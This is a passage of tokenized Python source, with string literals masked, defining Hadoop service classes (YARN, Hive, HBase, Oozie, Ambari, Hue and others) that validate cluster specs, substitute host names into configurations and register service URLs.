'<STR_LIT>' ) . pop ( ) . management_ip <EOL> ui_port = self . _get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> hs_port = self . 
_get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( historyserver_ip , ui_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( historyserver_ip , hs_port ) <EOL> } <EOL> return url_info <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> mr2_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = mr2_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> class YarnService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( YarnService , self ) . __init__ ( <EOL> YarnService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> count ) <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if not count : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , '<STR_LIT>' , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> rm_hosts = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if rm_hosts : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , rm_hosts . pop ( ) . fqdn ( ) , props ) <EOL> mapred_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> if CONF . enable_data_locality : <EOL> for prop in th . 
vm_awareness_mapred_config ( ) : <EOL> mapred_site_config [ prop [ '<STR_LIT:name>' ] ] = prop [ '<STR_LIT:value>' ] <EOL> yarn_site_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> nm_node_groups = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> if nm_node_groups : <EOL> common_paths = self . _get_common_paths ( nm_node_groups ) <EOL> yarn_site_config [ '<STR_LIT>' ] = ( <EOL> self . _generate_storage_path ( common_paths , <EOL> '<STR_LIT>' ) ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> resourcemgr_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> ui_port = self . _get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> rm_port = self . _get_port_from_cluster_spec ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( resourcemgr_ip , ui_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( resourcemgr_ip , rm_port ) <EOL> } <EOL> return url_info <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> class HiveService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( HiveService , self ) . __init__ ( HiveService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> hive_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hive_servers : <EOL> props = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hive_servers . 
pop ( ) . fqdn ( ) , props ) <EOL> hive_ms = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hive_ms : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hive_ms . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> hive_mysql = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if hive_mysql : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , hive_mysql . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_metastore_user ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_metastore_pwd ) <EOL> def _handle_user_property_metastore_user ( self , user_input , configurations ) : <EOL> hive_site_config_map = configurations [ '<STR_LIT>' ] <EOL> hive_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> def _handle_user_property_metastore_pwd ( self , user_input , configurations ) : <EOL> hive_site_config_map = configurations [ '<STR_LIT>' ] <EOL> hive_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hive_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = hive_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . 
append ( '<STR_LIT>' ) <EOL> class WebHCatService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( WebHCatService , self ) . __init__ ( WebHCatService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> webhcat_servers = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) <EOL> if webhcat_servers : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , webhcat_servers . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> hive_ms_servers = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) <EOL> if hive_ms_servers : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , <EOL> hive_ms_servers . pop ( ) . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> zk_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if zk_servers : <EOL> zk_list = [ '<STR_LIT>' . format ( z . fqdn ( ) ) for z in zk_servers ] <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT:U+002C>' . join ( zk_list ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> webhcat_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = webhcat_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . 
append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> if not cluster_spec . get_deployed_node_group_count ( <EOL> '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . append ( '<STR_LIT>' ) <EOL> components . append ( '<STR_LIT>' ) <EOL> class HBaseService ( Service ) : <EOL> property_map = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> } <EOL> def __init__ ( self ) : <EOL> super ( HBaseService , self ) . __init__ ( <EOL> HBaseService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . 
InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> master_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> hbase_config = cluster_spec . configurations [ '<STR_LIT>' ] <EOL> info_port = hbase_config [ '<STR_LIT>' ] <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) , <EOL> '<STR_LIT>' : '<STR_LIT>' % ( master_ip , info_port ) <EOL> } <EOL> return url_info <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> for prop_name in self . property_map : <EOL> ui_handlers [ prop_name ] = ( <EOL> self . _handle_config_property_update ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_root_dir ) <EOL> def _handle_config_property_update ( self , user_input , configurations ) : <EOL> self . _update_config_values ( configurations , user_input . value , <EOL> self . property_map [ user_input . config . name ] ) <EOL> def _handle_user_property_root_dir ( self , user_input , configurations ) : <EOL> configurations [ '<STR_LIT>' ] [ '<STR_LIT>' ] = user_input . value <EOL> match = re . search ( '<STR_LIT>' , user_input . value ) <EOL> if match : <EOL> configurations [ '<STR_LIT>' ] [ '<STR_LIT>' ] = match . group ( <NUM_LIT:3> ) <EOL> else : <EOL> raise e . InvalidDataException ( <EOL> _ ( "<STR_LIT>" ) <EOL> % user_input . value ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> nn_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if nn_servers : <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , nn_servers . pop ( ) . 
fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> zk_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if zk_servers : <EOL> zk_list = [ z . fqdn ( ) for z in zk_servers ] <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , '<STR_LIT:U+002C>' . join ( zk_list ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> hbase_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> components = hbase_ng [ <NUM_LIT:0> ] . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( <EOL> '<STR_LIT>' ) : <EOL> components . append ( '<STR_LIT>' ) <EOL> else : <EOL> hbase_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> for ng in hbase_ng : <EOL> components = ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if not cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> zk_service = next ( service for service in cluster_spec . services <EOL> if service . name == '<STR_LIT>' ) <EOL> zk_service . deployed = True <EOL> components . append ( '<STR_LIT>' ) <EOL> class ZookeeperService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( ZookeeperService , self ) . __init__ ( <EOL> ZookeeperService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count < <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , '<STR_LIT>' , count ) <EOL> if cluster_spec . is_hdfs_ha_enabled ( cluster ) : <EOL> if not ( count >= <NUM_LIT:3> and ( count % <NUM_LIT:2> == <NUM_LIT:1> ) ) : <EOL> raise ex . 
NameNodeHAConfigurationError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % count ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> class OozieService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( OozieService , self ) . __init__ ( OozieService . get_service_id ( ) ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if not count : <EOL> raise ex . InvalidComponentCountException ( <EOL> '<STR_LIT>' , '<STR_LIT>' , count ) <EOL> def finalize_configuration ( self , cluster_spec ) : <EOL> oozie_servers = cluster_spec . determine_component_hosts ( '<STR_LIT>' ) <EOL> if oozie_servers : <EOL> oozie_server = oozie_servers . pop ( ) <EOL> name_list = [ oozie_server . fqdn ( ) , oozie_server . internal_ip , <EOL> oozie_server . management_ip ] <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , oozie_server . fqdn ( ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> self . _replace_config_token ( <EOL> cluster_spec , '<STR_LIT>' , "<STR_LIT:U+002C>" . join ( name_list ) , <EOL> { '<STR_LIT>' : [ '<STR_LIT>' ] } ) <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> oozie_ng = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> components = oozie_ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . 
append ( '<STR_LIT>' ) <EOL> client_ngs = cluster_spec . get_node_groups_containing_component ( <EOL> '<STR_LIT>' ) <EOL> for ng in client_ngs : <EOL> components = ng . components <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in components : <EOL> components . append ( '<STR_LIT>' ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> oozie_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> port = self . _get_port_from_cluster_spec ( cluster_spec , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' % ( oozie_ip , port ) <EOL> } <EOL> return url_info <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_db_user ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_db_pwd ) <EOL> def _handle_user_property_db_user ( self , user_input , configurations ) : <EOL> oozie_site_config_map = configurations [ '<STR_LIT>' ] <EOL> oozie_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> def _handle_user_property_db_pwd ( self , user_input , configurations ) : <EOL> oozie_site_config_map = configurations [ '<STR_LIT>' ] <EOL> oozie_site_config_map [ '<STR_LIT>' ] = ( <EOL> user_input . value ) <EOL> class GangliaService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( GangliaService , self ) . __init__ ( GangliaService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def is_user_template_component ( self , component ) : <EOL> return component . 
name != '<STR_LIT>' <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> for ng in cluster_spec . node_groups . values ( ) : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> class AmbariService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( AmbariService , self ) . __init__ ( AmbariService . get_service_id ( ) , <EOL> False ) <EOL> self . configurations . add ( '<STR_LIT>' ) <EOL> self . admin_user_name = '<STR_LIT>' <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def validate ( self , cluster_spec , cluster ) : <EOL> count = cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) <EOL> if count != <NUM_LIT:1> : <EOL> raise ex . InvalidComponentCountException ( '<STR_LIT>' , <NUM_LIT:1> , count ) <EOL> def register_service_urls ( self , cluster_spec , url_info , cluster ) : <EOL> ambari_ip = cluster_spec . determine_component_hosts ( <EOL> '<STR_LIT>' ) . pop ( ) . management_ip <EOL> port = cluster_spec . configurations [ '<STR_LIT>' ] . get ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> url_info [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : '<STR_LIT>' . format ( ambari_ip , port ) <EOL> } <EOL> return url_info <EOL> def is_user_template_component ( self , component ) : <EOL> return component . name != '<STR_LIT>' <EOL> def register_user_input_handlers ( self , ui_handlers ) : <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_admin_user ) <EOL> ui_handlers [ '<STR_LIT>' ] = ( <EOL> self . _handle_user_property_admin_password ) <EOL> def is_mandatory ( self ) : <EOL> return True <EOL> def _handle_user_property_admin_user ( self , user_input , configurations ) : <EOL> admin_user = next ( user for user in self . users <EOL> if user . name == '<STR_LIT>' ) <EOL> admin_user . name = user_input . value <EOL> self . admin_user_name = user_input . 
value <EOL> def _handle_user_property_admin_password ( self , user_input , configurations ) : <EOL> admin_user = next ( user for user in self . users <EOL> if user . name == self . admin_user_name ) <EOL> admin_user . password = user_input . value <EOL> class SqoopService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( SqoopService , self ) . __init__ ( SqoopService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> sqoop_ngs = cluster_spec . get_node_groups_containing_component ( '<STR_LIT>' ) <EOL> for ng in sqoop_ngs : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> class NagiosService ( Service ) : <EOL> def __init__ ( self ) : <EOL> super ( NagiosService , self ) . __init__ ( NagiosService . get_service_id ( ) ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return '<STR_LIT>' <EOL> def finalize_ng_components ( self , cluster_spec ) : <EOL> nagios_ngs = ( <EOL> cluster_spec . get_node_groups_containing_component ( '<STR_LIT>' ) ) <EOL> for ng in nagios_ngs : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if cluster_spec . get_deployed_node_group_count ( '<STR_LIT>' ) : <EOL> if '<STR_LIT>' not in ng . components : <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in ng . components : <EOL> if not cluster_spec . get_deployed_node_group_count ( <EOL> '<STR_LIT>' ) : <EOL> hcat_service = next ( service for service in <EOL> cluster_spec . 
services if <EOL> service . name == '<STR_LIT>' ) <EOL> hcat_service . deployed = True <EOL> ng . components . append ( '<STR_LIT>' ) <EOL> class HueService ( Service ) : <EOL> default_web_ui_port = '<STR_LIT>' <EOL> required_services = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self ) : <EOL> super ( HueService , self ) . __init__ ( HueService . get_service_id ( ) , False ) <EOL> @ classmethod <EOL> def get_service_id ( cls ) : <EOL> return "<STR_LIT>" <EOL> @ staticmethod <EOL> def _get_java_home_from_config ( config ) : <EOL> return ( config . get ( '<STR_LIT>' , None ) <EOL> or config . get ( '<STR_LIT>' , None ) if config else None ) <EOL> @ staticmethod <EOL> def _get_java_home ( cluster_spec ) : <EOL> java_home = HueService . _get_java_home_from_config ( <EOL> cluster_spec . configurations . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> if not java_home : <EOL> java_home = HueService . _get_java_home_from_config ( <EOL> cluster_spec . configurations . get ( '<STR_LIT>' , None ) <EOL> ) <EOL> return java_home or '<STR_LIT>' <EOL> @ staticmethod <EOL> def _append_host_substitution ( cluster_spec , component , var_name , <EOL> var_pattern_name , subs ) : <EOL> hosts = cluster_spec . determine_component_hosts ( component ) <EOL> if hosts : <EOL> subs [ var_name ] = hosts . pop ( ) . fqdn ( ) or '<STR_LIT:localhost>' <EOL> subs [ var_pattern_name ] = subs [ var_name ] . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def _create_hue_ini_file_section ( property_sub_tree , level ) : <EOL> properties = property_sub_tree [ '<STR_LIT>' ] <EOL> sections = property_sub_tree [ '<STR_LIT>' ] <EOL> s = '<STR_LIT>' <EOL> if properties : <EOL> for name , value in six . iteritems ( properties ) : <EOL> s += '<STR_LIT:U+0020>' * ( level * <NUM_LIT:2> ) <EOL> s += "<STR_LIT>" . format ( name , value ) <EOL> if sections : <EOL> for name , section in six . 
iteritems ( sections ) : <EOL> s += "<STR_LIT:\n>" <EOL> s += '<STR_LIT:U+0020>' * ( ( level - <NUM_LIT:1> ) * <NUM_LIT:2> ) <EOL> s += '<STR_LIT:[>' * level <EOL> s += name <EOL> s += '<STR_LIT:]>' * level <EOL> s += "<STR_LIT:\n>" <EOL> s += HueService . _create_hue_ini_file_section ( section , <EOL> level + <NUM_LIT:1> ) <EOL> return s <EOL> @ staticmethod <EOL> def _create_hue_ini_file ( property_tree ) : <EOL> if property_tree : <EOL> return HueService . _create_hue_ini_file_section ( property_tree , <NUM_LIT:1> ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> @ staticmethod <EOL> def _create_hue_property_tree ( cluster_spec ) : <EOL> config_name = '<STR_LIT>' <EOL> hue_ini_property_tree = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> config = cluster_spec . configurations [ config_name ] <EOL> if config is None : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( <EOL> config_name = config_name ) ) <EOL> else : <EOL> subs = { } <EOL> subs [ '<STR_LIT>' ] = HueService . _get_java_home ( cluster_spec ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> HueService . _append_host_substitution ( cluster_spec , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> subs ) <EOL> for prop_name , prop_value in six . iteritems ( config ) : <EOL> if prop_value : <EOL> if subs : <EOL> for placeholder , sub in six . 
iteritems ( subs ) : <EOL> if prop_value . find ( placeholder ) >= <NUM_LIT:0> : <EOL> value = prop_value . replace ( placeholder , sub ) <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . <EOL> format ( p_name = prop_name , <EOL> p_value = prop_value , <EOL> value = value ) ) <EOL> prop_value = value <EOL> if prop_value and len ( prop_value ) > <NUM_LIT:0> : <EOL> node = hue_ini_property_tree <EOL> tokens = prop_name . split ( '<STR_LIT:/>' ) <EOL> if tokens : <EOL> name = tokens . pop ( ) <EOL> while tokens : <EOL> token = tokens . pop ( <NUM_LIT:0> ) <EOL> if token not in node [ '<STR_LIT>' ] : <EOL> data = { '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } } <EOL> node [ '<STR_LIT>' ] [ token ] = data <EOL> node = node [ '<STR_LIT>' ] [ token ] <EOL> node [ '<STR_LIT>' ] [ name ] = prop_value <EOL> LOG . info ( _LI ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . format ( config_name = config_name ) ) <EOL> return hue_ini_property_tree <EOL> @ staticmethod <EOL> def _merge_configurations ( cluster_spec , src_config_name , dst_config_name ) : <EOL> src_config = cluster_spec . configurations [ src_config_name ] <EOL> dst_config = cluster_spec . configurations [ dst_config_name ] <EOL> if src_config is None : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . <EOL> format ( config_name = src_config_name ) ) <EOL> elif dst_config is None : <EOL> LOG . warning ( _LW ( '<STR_LIT>' <EOL> '<STR_LIT>' ) . <EOL> format ( config_name = dst_config_name ) ) <EOL> else : <EOL> for property_name , property_value in six . iteritems ( src_config ) : <EOL> if property_name in dst_config : <EOL> if dst_config [ property_name ] == src_config [ property_name ] : <EOL> LOG . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( d_config_name = 